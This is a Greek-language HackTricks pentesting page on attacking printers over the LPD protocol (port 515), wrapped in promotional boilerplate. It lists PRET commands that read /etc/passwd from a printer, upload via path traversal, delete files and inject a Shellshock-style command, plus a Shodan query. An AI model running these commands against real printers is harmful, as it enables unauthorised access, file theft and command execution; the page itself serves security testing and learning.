Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)! Άλλοι τρόποι για να υποστηρίξετε το HackTricks: * Εάν θέλετε να δείτε την **εταιρεία σας να διαφημίζεται στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)! * Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com) * Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family) * **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα telegram**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
### **Εισαγωγή στο πρωτόκολλο LPD** Τη δεκαετία του 1980, το πρωτόκολλο **Line Printer Daemon (LPD)** αναπτύχθηκε στο Berkeley Unix, το οποίο αργότερα καθιερώθηκε μέσω του RFC1179. Αυτό το πρωτόκολλο λειτουργεί μέσω της θύρας 515/tcp, επιτρέποντας αλληλεπιδράσεις μέσω της εντολής `lpr`. Η ουσία της εκτύπωσης μέσω LPD περιλαμβάνει την αποστολή ενός **αρχείου ελέγχου** (για τον καθορισμό λεπτομερειών και χρήστη της εργασίας) μαζί με ένα **αρχείο δεδομένων** (το οποίο περιέχει τις πληροφορίες εκτύπωσης). Ενώ το αρχείο ελέγχου επιτρέπει την επιλογή **διάφορων μορφών αρχείων** για το αρχείο δεδομένων, η χειρισμός αυτών των αρχείων καθορίζεται από τη συγκεκριμένη υλοποίηση του LPD. Μια ευρέως αναγνωρισμένη υλοποίηση για συστήματα παρόμοια με Unix είναι το **LPRng**. Είναι σημαντικό να σημειωθεί ότι το πρωτόκολλο LPD μπορεί να εκμεταλλευτεί για την εκτέλεση **κακόβουλων εργασιών εκτύπωσης PostScript** ή **PJL**. ### **Εργαλεία για την αλληλεπίδραση με εκτυπωτές LPD** Το [**PRET**](https://github.com/RUB-NDS/PRET) παρουσιάζει δύο βασικά εργαλεία, το `lpdprint` και το `lpdtest`, που προσφέρουν έναν απλό τρόπο αλληλεπίδρασης με εκτυπωτές συμβατούς με το LPD. Αυτά τα εργαλεία επιτρέπουν μια σειρά ενεργειών από την εκτύπωση δεδομένων μέχρι την επεξεργασία αρχείων στον εκτυπωτή, όπως λήψη, αποστολή ή διαγραφή: ```python # To print a file to an LPD printer lpdprint.py hostname filename # To get a file from the printer lpdtest.py hostname get /etc/passwd # To upload a file to the printer lpdtest.py hostname put ../../etc/passwd # To remove a file from the printer lpdtest.py hostname rm /some/file/on/printer # To execute a command injection on the printer lpdtest.py hostname in '() {:;}; ping -c1 1.2.3.4' # To send a mail through the printer lpdtest.py hostname mail lpdtest@mailhost.local ``` Για άτομα που ενδιαφέρονται να εξερευνήσουν περαιτέρω τον κόσμο του **hacking εκτυπωτών**, μια περιεκτική πηγή πληροφοριών μπορεί να βρεθεί εδώ: [**Hacking Printers**](http://hacking-printers.net/wiki/index.php/Main_Page). # Shodan * `port 515`
Μάθετε το hacking του AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)! Άλλοι τρόποι για να υποστηρίξετε το HackTricks: * Εάν θέλετε να δείτε την **εταιρεία σας να διαφημίζεται στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF**, ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)! * Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com) * Ανακαλύψτε [**The PEASS Family**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family) * **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στην [**ομάδα telegram**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Μοιραστείτε τα hacking tricks σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.